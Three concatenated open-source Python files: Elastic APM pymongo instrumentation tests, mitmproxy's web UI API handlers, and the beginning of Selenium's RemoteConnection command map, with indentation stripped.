blogpost = {"author": "Tom", "text": "Foo", "date": datetime.datetime.utcnow()}
mongo_database.blogposts.insert_one(blogpost)
elasticapm_client.begin_transaction("transaction.test")
r = mongo_database.blogposts.delete_one({"author": "Tom"})
assert r.deleted_count == 1
elasticapm_client.end_transaction("transaction.test")
transactions = elasticapm_client.events[TRANSACTION]
span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transactions[0]))
assert span["type"] == "db"
assert span["subtype"] == "mongodb"
assert span["action"] == "query"
assert span["name"] == "elasticapm_test.blogposts.delete_one"
@pytest.mark.integrationtest
@pytest.mark.skipif(pymongo.version_tuple < (3, 0), reason="New in 3.0")
def test_collection_delete_many(instrument, elasticapm_client, mongo_database):
blogpost = {"author": "Tom", "text": "Foo", "date": datetime.datetime.utcnow()}
mongo_database.blogposts.insert_one(blogpost)
elasticapm_client.begin_transaction("transaction.test")
r = mongo_database.blogposts.delete_many({"author": "Tom"})
assert r.deleted_count == 1
elasticapm_client.end_transaction("transaction.test")
transactions = elasticapm_client.events[TRANSACTION]
span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transactions[0]))
assert span["type"] == "db"
assert span["subtype"] == "mongodb"
assert span["action"] == "query"
assert span["name"] == "elasticapm_test.blogposts.delete_many"
@pytest.mark.skipif(pymongo.version_tuple >= (4, 0), reason="Removed in 4.0")
@pytest.mark.integrationtest
def test_collection_insert(instrument, elasticapm_client, mongo_database):
blogpost = {"author": "Tom", "text": "Foo", "date": datetime.datetime.utcnow()}
elasticapm_client.begin_transaction("transaction.test")
r = mongo_database.blogposts.insert(blogpost)
assert r is not None
elasticapm_client.end_transaction("transaction.test")
transactions = elasticapm_client.events[TRANSACTION]
span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transactions[0]))
assert span["type"] == "db"
assert span["subtype"] == "mongodb"
assert span["action"] == "query"
assert span["name"] == "elasticapm_test.blogposts.insert"
@pytest.mark.integrationtest
@pytest.mark.skipif(pymongo.version_tuple < (3, 0), reason="New in 3.0")
def test_collection_insert_one(instrument, elasticapm_client, mongo_database):
blogpost = {"author": "Tom", "text": "Foo", "date": datetime.datetime.utcnow()}
elasticapm_client.begin_transaction("transaction.test")
r = mongo_database.blogposts.insert_one(blogpost)
assert r.inserted_id is not None
elasticapm_client.end_transaction("transaction.test")
transactions = elasticapm_client.events[TRANSACTION]
span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transactions[0]))
assert span["type"] == "db"
assert span["subtype"] == "mongodb"
assert span["action"] == "query"
assert span["name"] == "elasticapm_test.blogposts.insert_one"
@pytest.mark.integrationtest
@pytest.mark.skipif(pymongo.version_tuple < (3, 0), reason="New in 3.0")
def test_collection_insert_many(instrument, elasticapm_client, mongo_database):
blogpost = {"author": "Tom", "text": "Foo", "date": datetime.datetime.utcnow()}
elasticapm_client.begin_transaction("transaction.test")
r = mongo_database.blogposts.insert_many([blogpost])
assert len(r.inserted_ids) == 1
elasticapm_client.end_transaction("transaction.test")
transactions = elasticapm_client.events[TRANSACTION]
span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transactions[0]))
assert span["type"] == "db"
assert span["subtype"] == "mongodb"
assert span["action"] == "query"
assert span["name"] == "elasticapm_test.blogposts.insert_many"
@pytest.mark.skipif(pymongo.version_tuple >= (4, 0), reason="Removed in 4.0")
@pytest.mark.integrationtest
def test_collection_find(instrument, elasticapm_client, mongo_database):
blogpost = {"author": "Tom", "text": "Foo", "date": datetime.datetime.utcnow()}
blogposts = []
for i in range(1000):
blogposts.append({"author": "Tom", "comments": i})
mongo_database.blogposts.insert(blogposts)
r = mongo_database.blogposts.insert(blogpost)
elasticapm_client.begin_transaction("transaction.test")
r = list(mongo_database.blogposts.find({"comments": {"$gt": 995}}))
elasticapm_client.end_transaction("transaction.test")
transactions = elasticapm_client.events[TRANSACTION]
spans = elasticapm_client.spans_for_transaction(transactions[0])
span = _get_pymongo_span(spans)
assert span["type"] == "db"
assert span["subtype"] == "mongodb"
assert span["action"] == "query"
assert span["name"] == "elasticapm_test.blogposts.cursor.refresh"
if not pymongo.version_tuple < (3, 0):
assert span["context"]["destination"] == {
"address": os.environ.get("MONGODB_HOST", "localhost"),
"port": int(os.environ.get("MONGODB_PORT", 27017)),
"service": {"name": "", "resource": "mongodb", "type": ""},
}
@pytest.mark.integrationtest
@pytest.mark.skipif(pymongo.version_tuple < (3, 0), reason="New in 3.0")
def test_collection_find_one(instrument, elasticapm_client, mongo_database):
blogpost = {"author": "Tom", "text": "Foo", "date": datetime.datetime.utcnow()}
r = mongo_database.blogposts.insert_one(blogpost)
elasticapm_client.begin_transaction("transaction.test")
r = mongo_database.blogposts.find_one({"author": "Tom"})
assert r["author"] == "Tom"
elasticapm_client.end_transaction("transaction.test")
transactions = elasticapm_client.events[TRANSACTION]
span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transactions[0]))
assert span["type"] == "db"
assert span["subtype"] == "mongodb"
assert span["action"] == "query"
assert span["name"] == "elasticapm_test.blogposts.find_one"
assert span["context"]["destination"] == {
"address": os.environ.get("MONGODB_HOST", "localhost"),
"port": int(os.environ.get("MONGODB_PORT", 27017)),
"service": {"name": "", "resource": "mongodb", "type": ""},
}
@pytest.mark.skipif(pymongo.version_tuple >= (4, 0), reason="Removed in 4.0")
@pytest.mark.integrationtest
def test_collection_remove(instrument, elasticapm_client, mongo_database):
blogpost = {"author": "Tom", "text": "Foo", "date": datetime.datetime.utcnow()}
r = mongo_database.blogposts.insert(blogpost)
elasticapm_client.begin_transaction("transaction.test")
r = mongo_database.blogposts.remove({"author": "Tom"})
assert r["n"] == 1
elasticapm_client.end_transaction("transaction.test")
transactions = elasticapm_client.events[TRANSACTION]
span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transactions[0]))
assert span["type"] == "db"
assert span["subtype"] == "mongodb"
assert span["action"] == "query"
assert span["name"] == "elasticapm_test.blogposts.remove"
@pytest.mark.skipif(pymongo.version_tuple >= (4, 0), reason="Removed in 4.0")
@pytest.mark.integrationtest
def test_collection_update(instrument, elasticapm_client, mongo_database):
blogpost = {"author": "Tom", "text": "Foo", "date": datetime.datetime.utcnow()}
r = mongo_database.blogposts.insert(blogpost)
elasticapm_client.begin_transaction("transaction.test")
r = mongo_database.blogposts.update({"author": "Tom"}, {"$set": {"author": "Jerry"}})
assert r["n"] == 1
elasticapm_client.end_transaction("transaction.test")
transactions = elasticapm_client.events[TRANSACTION]
span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transactions[0]))
assert span["type"] == "db"
assert span["subtype"] == "mongodb"
assert span["action"] == "query"
assert span["name"] == "elasticapm_test.blogposts.update"
@pytest.mark.integrationtest
@pytest.mark.skipif(pymongo.version_tuple < (3, 0), reason="New in 3.0")
def test_collection_update_one(instrument, elasticapm_client, mongo_database):
blogpost = {"author": "Tom", "text": "Foo", "date": datetime.datetime.utcnow()}
r = mongo_database.blogposts.insert_one(blogpost)
elasticapm_client.begin_transaction("transaction.test")
r = mongo_database.blogposts.update_one({"author": "Tom"}, {"$set": {"author": "Jerry"}})
assert r.modified_count == 1
elasticapm_client.end_transaction("transaction.test")
transactions = elasticapm_client.events[TRANSACTION]
span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transactions[0]))
assert span["type"] == "db"
assert span["subtype"] == "mongodb"
assert span["action"] == "query"
assert span["name"] == "elasticapm_test.blogposts.update_one"
@pytest.mark.integrationtest
@pytest.mark.skipif(pymongo.version_tuple >= (4, 0), reason="Removed in 4.0")
@pytest.mark.skipif(pymongo.version_tuple < (3, 0), reason="New in 3.0")
def test_collection_update_many(instrument, elasticapm_client, mongo_database):
blogpost = {"author": "Tom", "text": "Foo", "date": datetime.datetime.utcnow()}
r = mongo_database.blogposts.insert_one(blogpost)
elasticapm_client.begin_transaction("transaction.test")
r = mongo_database.blogposts.update_many({"author": "Tom"}, {"$set": {"author": "Jerry"}})
assert r.modified_count == 1
elasticapm_client.end_transaction("transaction.test")
transactions = elasticapm_client.events[TRANSACTION]
span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transactions[0]))
assert span["type"] == "db"
assert span["subtype"] == "mongodb"
assert span["action"] == "query"
assert span["name"] == "elasticapm_test.blogposts.update_many"
@pytest.mark.integrationtest
@pytest.mark.skipif(pymongo.version_tuple < (2, 7), reason="New in 2.7")
@pytest.mark.skipif(pymongo.version_tuple >= (4, 0), reason="Removed in 4.0")
def test_bulk_execute(instrument, elasticapm_client, mongo_database):
elasticapm_client.begin_transaction("transaction.test")
bulk = mongo_database.test_bulk.initialize_ordered_bulk_op()
bulk.insert({"x": "y"})
bulk.insert({"z": "x"})
bulk.find({"x": "y"}).replace_one({"x": "z"})
bulk.execute()
elasticapm_client.end_transaction("transaction.test")
transactions = elasticapm_client.events[TRANSACTION]
span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transactions[0]))
assert span["type"] == "db"
assert span["subtype"] == "mongodb"
assert span["action"] == "query"
assert span["name"] == "elasticapm_test.test_bulk.bulk.execute"
def _get_pymongo_span(spans):
for span in spans:
if span["subtype"] == "mongodb":
return span
| |
import hashlib
import json
import logging
import os.path
import re
from io import BytesIO
import mitmproxy.addons.view
import mitmproxy.flow
import tornado.escape
import tornado.web
import tornado.websocket
from mitmproxy import contentviews
from mitmproxy import exceptions
from mitmproxy import flowfilter
from mitmproxy import http
from mitmproxy import io
from mitmproxy import log
from mitmproxy import version
def flow_to_json(flow: mitmproxy.flow.Flow) -> dict:
"""
Remove flow message content and cert to save transmission space.
Args:
flow: The original flow.
"""
f = {
"id": flow.id,
"intercepted": flow.intercepted,
"client_conn": flow.client_conn.get_state(),
"server_conn": flow.server_conn.get_state(),
"type": flow.type,
"modified": flow.modified(),
"marked": flow.marked,
}
# .alpn_proto_negotiated is bytes, we need to decode that.
for conn in "client_conn", "server_conn":
if f[conn]["alpn_proto_negotiated"] is None:
continue
f[conn]["alpn_proto_negotiated"] = \
f[conn]["alpn_proto_negotiated"].decode(errors="backslashreplace")
if flow.error:
f["error"] = flow.error.get_state()
if isinstance(flow, http.HTTPFlow):
if flow.request:
if flow.request.raw_content:
content_length = len(flow.request.raw_content)
content_hash = hashlib.sha256(flow.request.raw_content).hexdigest()
else:
content_length = None
content_hash = None
f["request"] = {
"method": flow.request.method,
"scheme": flow.request.scheme,
"host": flow.request.host,
"port": flow.request.port,
"path": flow.request.path,
"http_version": flow.request.http_version,
"headers": tuple(flow.request.headers.items(True)),
"contentLength": content_length,
"contentHash": content_hash,
"timestamp_start": flow.request.timestamp_start,
"timestamp_end": flow.request.timestamp_end,
"is_replay": flow.request.is_replay,
"pretty_host": flow.request.pretty_host,
}
if flow.response:
if flow.response.raw_content:
content_length = len(flow.response.raw_content)
content_hash = hashlib.sha256(flow.response.raw_content).hexdigest()
else:
content_length = None
content_hash = None
f["response"] = {
"http_version": flow.response.http_version,
"status_code": flow.response.status_code,
"reason": flow.response.reason,
"headers": tuple(flow.response.headers.items(True)),
"contentLength": content_length,
"contentHash": content_hash,
"timestamp_start": flow.response.timestamp_start,
"timestamp_end": flow.response.timestamp_end,
"is_replay": flow.response.is_replay,
}
f.get("server_conn", {}).pop("cert", None)
f.get("client_conn", {}).pop("mitmcert", None)
return f
def logentry_to_json(e: log.LogEntry) -> dict:
return {
"id": id(e), # we just need some kind of id.
"message": e.msg,
"level": e.level
}
class APIError(tornado.web.HTTPError):
pass
class RequestHandler(tornado.web.RequestHandler):
def write(self, chunk):
# Writing arrays on the top level is ok nowadays.
# http://flask.pocoo.org/docs/0.11/security/#json-security
if isinstance(chunk, list):
chunk = tornado.escape.json_encode(chunk)
self.set_header("Content-Type", "application/json; charset=UTF-8")
super(RequestHandler, self).write(chunk)
def set_default_headers(self):
super().set_default_headers()
self.set_header("Server", version.MITMPROXY)
self.set_header("X-Frame-Options", "DENY")
self.add_header("X-XSS-Protection", "1; mode=block")
self.add_header("X-Content-Type-Options", "nosniff")
self.add_header(
"Content-Security-Policy",
"default-src 'self'; "
"connect-src 'self' ws://* ; "
"style-src 'self' 'unsafe-inline'"
)
@property
def json(self):
if not self.request.headers.get("Content-Type", "").startswith("application/json"):
raise APIError(400, "Invalid Content-Type, expected application/json.")
try:
return json.loads(self.request.body.decode())
except Exception as e:
raise APIError(400, "Malformed JSON: {}".format(str(e)))
@property
def filecontents(self):
"""
Accept either a multipart/form file upload or just take the plain request body.
"""
if self.request.files:
return next(iter(self.request.files.values()))[0].body
else:
return self.request.body
@property
def view(self) -> mitmproxy.addons.view.View:
return self.application.master.view
@property
def master(self) -> "mitmproxy.tools.web.master.WebMaster":
return self.application.master
@property
def flow(self) -> mitmproxy.flow.Flow:
flow_id = str(self.path_kwargs["flow_id"])
# FIXME: Add a facility to addon.view to safely access the store
flow = self.view.get_by_id(flow_id)
if flow:
return flow
else:
raise APIError(404, "Flow not found.")
def write_error(self, status_code: int, **kwargs):
if "exc_info" in kwargs and isinstance(kwargs["exc_info"][1], APIError):
self.finish(kwargs["exc_info"][1].log_message)
else:
super().write_error(status_code, **kwargs)
class IndexHandler(RequestHandler):
def get(self):
token = self.xsrf_token # https://github.com/tornadoweb/tornado/issues/645
assert token
self.render("index.html")
class FilterHelp(RequestHandler):
def get(self):
self.write(dict(
commands=flowfilter.help
))
class WebSocketEventBroadcaster(tornado.websocket.WebSocketHandler):
# raise an error if inherited class doesn't specify its own instance.
connections = None # type: set
def open(self):
self.connections.add(self)
def on_close(self):
self.connections.remove(self)
@classmethod
def broadcast(cls, **kwargs):
message = json.dumps(kwargs, ensure_ascii=False).encode("utf8", "surrogateescape")
for conn in cls.connections:
try:
conn.write_message(message)
except Exception: # pragma: no cover
logging.error("Error sending message", exc_info=True)
class ClientConnection(WebSocketEventBroadcaster):
connections = set() # type: set
class Flows(RequestHandler):
def get(self):
self.write([flow_to_json(f) for f in self.view])
class DumpFlows(RequestHandler):
def get(self):
self.set_header("Content-Disposition", "attachment; filename=flows")
self.set_header("Content-Type", "application/octet-stream")
bio = BytesIO()
fw = io.FlowWriter(bio)
for f in self.view:
fw.add(f)
self.write(bio.getvalue())
bio.close()
def post(self):
self.view.clear()
bio = BytesIO(self.filecontents)
self.master.load_flows(io.FlowReader(bio))
bio.close()
class ClearAll(RequestHandler):
def post(self):
self.view.clear()
self.master.events.clear()
class ResumeFlows(RequestHandler):
def post(self):
for f in self.view:
f.resume()
self.view.update(f)
class KillFlows(RequestHandler):
def post(self):
for f in self.view:
if f.killable:
f.kill()
self.view.update(f)
class ResumeFlow(RequestHandler):
def post(self, flow_id):
self.flow.resume()
self.view.update(self.flow)
class KillFlow(RequestHandler):
def post(self, flow_id):
if self.flow.killable:
self.flow.kill()
self.view.update(self.flow)
class FlowHandler(RequestHandler):
def delete(self, flow_id):
if self.flow.killable:
self.flow.kill()
self.view.remove(self.flow)
def put(self, flow_id):
flow = self.flow
flow.backup()
try:
for a, b in self.json.items():
if a == "request" and hasattr(flow, "request"):
request = flow.request
for k, v in b.items():
if k in ["method", "scheme", "host", "path", "http_version"]:
setattr(request, k, str(v))
elif k == "port":
request.port = int(v)
elif k == "headers":
request.headers.clear()
for header in v:
request.headers.add(*header)
elif k == "content":
request.text = v
else:
raise APIError(400, "Unknown update request.{}: {}".format(k, v))
elif a == "response" and hasattr(flow, "response"):
response = flow.response
for k, v in b.items():
if k in ["msg", "http_version"]:
setattr(response, k, str(v))
elif k == "code":
response.status_code = int(v)
elif k == "headers":
response.headers.clear()
for header in v:
response.headers.add(*header)
elif k == "content":
response.text = v
else:
raise APIError(400, "Unknown update response.{}: {}".format(k, v))
else:
raise APIError(400, "Unknown update {}: {}".format(a, b))
except APIError:
flow.revert()
raise
self.view.update(flow)
class DuplicateFlow(RequestHandler):
def post(self, flow_id):
f = self.flow.copy()
self.view.add(f)
self.write(f.id)
class RevertFlow(RequestHandler):
def post(self, flow_id):
if self.flow.modified():
self.flow.revert()
self.view.update(self.flow)
class ReplayFlow(RequestHandler):
def post(self, flow_id):
self.flow.backup()
self.flow.response = None
self.view.update(self.flow)
try:
self.master.replay_request(self.flow)
except exceptions.ReplayException as e:
raise APIError(400, str(e))
class FlowContent(RequestHandler):
def post(self, flow_id, message):
self.flow.backup()
message = getattr(self.flow, message)
message.content = self.filecontents
self.view.update(self.flow)
def get(self, flow_id, message):
message = getattr(self.flow, message)
if not message.raw_content:
raise APIError(400, "No content.")
content_encoding = message.headers.get("Content-Encoding", None)
if content_encoding:
content_encoding = re.sub(r"[^\w]", "", content_encoding)
self.set_header("Content-Encoding", content_encoding)
original_cd = message.headers.get("Content-Disposition", None)
filename = None
if original_cd:
filename = re.search('filename=([-\w" .()]+)', original_cd)
if filename:
filename = filename.group(1)
if not filename:
filename = self.flow.request.path.split("?")[0].split("/")[-1]
filename = re.sub(r'[^-\w" .()]', "", filename)
cd = "attachment; filename={}".format(filename)
self.set_header("Content-Disposition", cd)
self.set_header("Content-Type", "application/text")
self.set_header("X-Content-Type-Options", "nosniff")
self.set_header("X-Frame-Options", "DENY")
self.write(message.raw_content)
class FlowContentView(RequestHandler):
def get(self, flow_id, message, content_view):
message = getattr(self.flow, message)
description, lines, error = contentviews.get_message_content_view(
content_view.replace('_', ' '), message
)
# if error:
# add event log
self.write(dict(
lines=list(lines),
description=description
))
class Events(RequestHandler):
def get(self):
self.write([logentry_to_json(e) for e in self.master.events.data])
class Settings(RequestHandler):
def get(self):
self.write(dict(
version=version.VERSION,
mode=str(self.master.options.mode),
intercept=self.master.options.intercept,
showhost=self.master.options.showhost,
no_upstream_cert=self.master.options.no_upstream_cert,
rawtcp=self.master.options.rawtcp,
http2=self.master.options.http2,
websocket=self.master.options.websocket,
anticache=self.master.options.anticache,
anticomp=self.master.options.anticomp,
stickyauth=self.master.options.stickyauth,
stickycookie=self.master.options.stickycookie,
stream=self.master.options.stream_large_bodies,
contentViews=[v.name.replace(' ', '_') for v in contentviews.views],
listen_host=self.master.options.listen_host,
listen_port=self.master.options.listen_port,
))
def put(self):
update = self.json
option_whitelist = {
"intercept", "showhost", "no_upstream_cert",
"rawtcp", "http2", "websocket", "anticache", "anticomp",
"stickycookie", "stickyauth", "stream_large_bodies"
}
for k in update:
if k not in option_whitelist:
raise APIError(400, "Unknown setting {}".format(k))
self.master.options.update(**update)
class Application(tornado.web.Application):
def __init__(self, master, debug):
self.master = master
handlers = [
(r"/", IndexHandler),
(r"/filter-help", FilterHelp),
(r"/updates", ClientConnection),
(r"/events", Events),
(r"/flows", Flows),
(r"/flows/dump", DumpFlows),
(r"/flows/resume", ResumeFlows),
(r"/flows/kill", KillFlows),
(r"/flows/(?P<flow_id>[0-9a-f\-]+)", FlowHandler),
(r"/flows/(?P<flow_id>[0-9a-f\-]+)/resume", ResumeFlow),
(r"/flows/(?P<flow_id>[0-9a-f\-]+)/kill", KillFlow),
(r"/flows/(?P<flow_id>[0-9a-f\-]+)/duplicate", DuplicateFlow),
(r"/flows/(?P<flow_id>[0-9a-f\-]+)/replay", ReplayFlow),
(r"/flows/(?P<flow_id>[0-9a-f\-]+)/revert", RevertFlow),
(r"/flows/(?P<flow_id>[0-9a-f\-]+)/(?P<message>request|response)/content", FlowContent),
(
r"/flows/(?P<flow_id>[0-9a-f\-]+)/(?P<message>request|response)/content/(?P<content_view>[0-9a-zA-Z\-\_]+)",
FlowContentView),
(r"/settings", Settings),
(r"/clear", ClearAll),
]
settings = dict(
template_path=os.path.join(os.path.dirname(__file__), "templates"),
static_path=os.path.join(os.path.dirname(__file__), "static"),
xsrf_cookies=True,
cookie_secret=os.urandom(256),
debug=debug,
autoreload=False,
)
super().__init__(handlers, **settings)
| |
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import socket
import string
import base64
try:
import http.client as httplib
from urllib import request as url_request
from urllib import parse
except ImportError: # above is available in py3+, below is py2.7
import httplib as httplib
import urllib2 as url_request
import urlparse as parse
from .command import Command
from .errorhandler import ErrorCode
from . import utils
LOGGER = logging.getLogger(__name__)
class Request(url_request.Request):
"""
Extends the url_request.Request to support all HTTP request types.
"""
def __init__(self, url, data=None, method=None):
"""
Initialise a new HTTP request.
:Args:
- url - String for the URL to send the request to.
- data - Data to send with the request.
"""
if method is None:
method = data is not None and 'POST' or 'GET'
elif method != 'POST' and method != 'PUT':
data = None
self._method = method
url_request.Request.__init__(self, url, data=data)
def get_method(self):
"""
Returns the HTTP method used by this request.
"""
return self._method
class Response(object):
"""
Represents an HTTP response.
"""
def __init__(self, fp, code, headers, url):
"""
Initialise a new Response.
:Args:
- fp - The response body file object.
- code - The HTTP status code returned by the server.
- headers - A dictionary of headers returned by the server.
- url - URL of the retrieved resource represented by this Response.
"""
self.fp = fp
self.read = fp.read
self.code = code
self.headers = headers
self.url = url
def close(self):
"""
Close the response body file object.
"""
self.read = None
self.fp = None
def info(self):
"""
Returns the response headers.
"""
return self.headers
def geturl(self):
"""
Returns the URL for the resource returned in this response.
"""
return self.url
class HttpErrorHandler(url_request.HTTPDefaultErrorHandler):
"""
A custom HTTP error handler.
Used to return Response objects instead of raising an HTTPError exception.
"""
def http_error_default(self, req, fp, code, msg, headers):
"""
Default HTTP error handler.
:Args:
- req - The original Request object.
- fp - The response body file object.
- code - The HTTP status code returned by the server.
- msg - The HTTP status message returned by the server.
- headers - The response headers.
:Returns:
A new Response object.
"""
return Response(fp, code, headers, req.get_full_url())
class RemoteConnection(object):
"""A connection with the Remote WebDriver server.
Communicates with the server using the WebDriver wire protocol:
https://github.com/SeleniumHQ/selenium/wiki/JsonWireProtocol"""
_timeout = socket._GLOBAL_DEFAULT_TIMEOUT
@classmethod
def get_timeout(cls):
"""
:Returns:
Timeout value in seconds for all http requests made to the Remote Connection
"""
return None if cls._timeout == socket._GLOBAL_DEFAULT_TIMEOUT else cls._timeout
@classmethod
def set_timeout(cls, timeout):
"""
Override the default timeout
:Args:
- timeout - timeout value for http requests in seconds
"""
cls._timeout = timeout
@classmethod
def reset_timeout(cls):
"""
Reset the http request timeout to socket._GLOBAL_DEFAULT_TIMEOUT
"""
cls._timeout = socket._GLOBAL_DEFAULT_TIMEOUT
def __init__(self, remote_server_addr, keep_alive=False, resolve_ip=True):
# Attempt to resolve the hostname and get an IP address.
self.keep_alive = keep_alive
parsed_url = parse.urlparse(remote_server_addr)
self._hostname = parsed_url.hostname
addr = ""
if parsed_url.hostname and resolve_ip:
try:
netloc = socket.gethostbyname(parsed_url.hostname)
addr = netloc
if parsed_url.port:
netloc += ':%d' % parsed_url.port
if parsed_url.username:
auth = parsed_url.username
if parsed_url.password:
auth += ':%s' % parsed_url.password
netloc = '%s@%s' % (auth, netloc)
remote_server_addr = parse.urlunparse(
(parsed_url.scheme, netloc, parsed_url.path,
parsed_url.params, parsed_url.query, parsed_url.fragment))
except socket.gaierror:
LOGGER.info('Could not get IP address for host: %s' % parsed_url.hostname)
self._url = remote_server_addr
if keep_alive:
self._conn = httplib.HTTPConnection(
str(addr), str(parsed_url.port), timeout=self._timeout)
self._commands = {
Command.STATUS: ('GET', '/status'),
Command.NEW_SESSION: ('POST', '/session'),
Command.GET_ALL_SESSIONS: ('GET', '/sessions'),
Command.QUIT: ('DELETE', '/session/$sessionId'),
Command.GET_CURRENT_WINDOW_HANDLE:
('GET', '/session/$sessionId/window_handle'),
Command.GET_WINDOW_HANDLES:
('GET', '/session/$sessionId/window_handles'),
Command.GET: ('POST', '/session/$sessionId/url'),
Command.GO_FORWARD: ('POST', '/session/$sessionId/forward'),
Command.GO_BACK: ('POST', '/session/$sessionId/back'),
Command.REFRESH: ('POST', '/session/$sessionId/refresh'),
Command.EXECUTE_SCRIPT: ('POST', '/session/$sessionId/execute'),
Command.GET_CURRENT_URL: ('GET', '/session/$sessionId/url'),
Command.GET_TITLE: ('GET', '/session/$sessionId/title'),
Command.GET_PAGE_SOURCE: ('GET', '/session/$sessionId/source'),
Command.SCREENSHOT: ('GET', '/session/$sessionId/screenshot'),
Command.ELEMENT_SCREENSHOT: ('GET', '/session/$sessionId/screenshot/$id'),
Command.FIND_ELEMENT: ('POST', '/session/$sessionId/element'),
Command.FIND_ELEMENTS: ('POST', '/session/$sessionId/elements'),
Command.GET_ACTIVE_ELEMENT:
('POST', '/session/$sessionId/element/active'),
Command.FIND_CHILD_ELEMENT:
('POST', '/session/$sessionId/element/$id/element'),
Command.FIND_CHILD_ELEMENTS:
('POST', '/session/$sessionId/element/$id/elements'),
Command.CLICK_ELEMENT: ('POST', '/session/$sessionId/element/$id/click'),
Command.CLEAR_ELEMENT: ('POST', '/session/$sessionId/element/$id/clear'),
Command.SUBMIT_ELEMENT: ('POST', '/session/$sessionId/element/$id/submit'),
Command.GET_ELEMENT_TEXT: ('GET', '/session/$sessionId/element/$id/text'),
Command.SEND_KEYS_TO_ELEMENT:
('POST', '/session/$sessionId/element/$id/value'),
Command.SEND_KEYS_TO_ACTIVE_ELEMENT:
('POST', '/session/$sessionId/keys'),
Command.UPLOAD_FILE: ('POST', "/session/$sessionId/file"),
Command.GET_ELEMENT_VALUE:
('GET', '/session/$sessionId/element/$id/value'),
Command.GET_ELEMENT_TAG_NAME:
('GET', '/session/$sessionId/element/$id/name'),
Command.IS_ELEMENT_SELECTED:
('GET', '/session/$sessionId/element/$id/selected'),
Command.SET_ELEMENT_SELECTED:
('POST', '/session/$sessionId/element/$id/selected'),
Command.IS_ELEMENT_ENABLED:
('GET', '/session/$sessionId/element/$id/enabled'),
Command.IS_ELEMENT_DISPLAYED:
('GET', '/session/$sessionId/element/$id/displayed'),
Command.GET_ELEMENT_LOCATION:
('GET', '/session/$sessionId/element/$id/location'),
Command.GET_ELEMENT_LOCATION_ONCE_SCROLLED_INTO_VIEW:
('GET', '/session/$sessionId/element/$id/location_in_view'),
Command.GET_ELEMENT_SIZE:
('GET', '/session/$sessionId/element/$id/size'),
Command.GET_ELEMENT_RECT:
('GET', '/session/$sessionId/element/$id/rect'),
Command.GET_ELEMENT_ATTRIBUTE:
('GET', '/session/$sessionId/element/$id/attribute/$name'),
Command.ELEMENT_EQUALS:
('GET', '/session/$sessionId/element/$id/equals/$other'),
Command.GET_ALL_COOKIES: ('GET', '/session/$sessionId/cookie'),
Command.ADD_COOKIE: ('POST', '/session/$sessionId/cookie'),
Command.DELETE_ALL_COOKIES:
('DELETE', '/session/$sessionId/cookie'),
Command.DELETE_COOKIE:
('DELETE', '/session/$sessionId/cookie/$name'),
Command.SWITCH_TO_FRAME: ('POST', '/session/$sessionId/frame'),
Command.SWITCH_TO_PARENT_FRAME: ('POST', '/session/$sessionId/frame/parent'),
Command.SWITCH_TO_WINDOW: ('POST', '/session/$sessionId/window'),
Command.CLOSE: ('DELETE', '/session/$sessionId/window'),
Command.GET_ELEMENT_VALUE_OF_CSS_PROPERTY:
('GET', '/session/$sessionId/element/$id/css/$propertyName'),
Command.IMPLICIT_WAIT:
('POST', '/session/$sessionId/timeouts/implicit_wait'),
Command.EXECUTE_ASYNC_SCRIPT: ('POST', '/session/$sessionId/execute_async'),
Command.SET_SCRIPT_TIMEOUT:
('POST', '/session/$sessionId/timeouts/async_script'),
Command.SET_TIMEOUTS:
('POST', '/session/$sessionId/timeouts'),
Command.DISMISS_ALERT:
('POST', '/session/$sessionId/dismiss_alert'),
Command.ACCEPT_ALERT:
('POST', '/session/$sessionId/accept_alert'),
Command.SET_ALERT_VALUE:
('POST', '/session/$sessionId/alert_text'),
Command.GET_ALERT_TEXT:
('GET', '/session/$sessionId/alert_text'),
Command.SET_ALERT_CREDENTIALS:
('POST', '/session/$sessionId/alert/credentials'),
Command.CLICK:
('POST', '/session/$sessionId/click'),
Command.DOUBLE_CLICK:
('POST', '/session/$sessionId/doubleclick'),
Command.MOUSE_DOWN:
('POST', '/session/$sessionId/buttondown'),
Command.MOUSE_UP:
('POST', '/session/$sessionId/buttonup'),
Command.MOVE_TO:
('POST', '/session/$sessionId/moveto'),
Command.GET_WINDOW_SIZE:
('GET', '/session/$sessionId/window/$windowHandle/size'),
Command.W3C_GET_WINDOW_SIZE:
('GET', '/session/$sessionId/window/size'),
Command.SET_WINDOW_SIZE:
('POST', '/session/$sessionId/window/$windowHandle/size'),
Command.W3C_SET_WINDOW_SIZE:
('POST', '/session/$sessionId/window/size'),
Command.GET_WINDOW_POSITION:
('GET', '/session/$sessionId/window/$windowHandle/position'),
Command.SET_WINDOW_POSITION:
('POST', '/session/$sessionId/window/$windowHandle/position'),
Command.MAXIMIZE_WINDOW:
('POST', '/session/$sessionId/window/$windowHandle/maximize'),
Command.W3C_MAXIMIZE_WINDOW:
('POST', '/session/$sessionId/window/maximize'),
Command.SET_SCREEN_ORIENTATION:
('POST', '/session/$sessionId/orientation'),
Command.GET_SCREEN_ORIENTATION:
('GET', '/session/$sessionId/orientation'),
Command.SINGLE_TAP:
('POST', '/session/$sessionId/touch/click'),
Command.TOUCH_DOWN:
('POST', '/session/$sessionId/touch/down'),
Command.TOUCH_UP:
('POST', '/session/$sessionId/touch/up'),
Command.TOUCH_MOVE:
('POST', '/session/$sessionId/touch/move'),
Command.TOUCH_SCROLL:
('POST', '/session/$sessionId/touch/scroll'),
Command.DOUBLE_TAP:
('POST', '/session/$sessionId/touch/doubleclick'),
Command.LONG_PRESS:
('POST', '/session/$sessionId/touch/longclick'),
Command.FLICK:
('POST', '/session/$sessionId/touch/flick'),
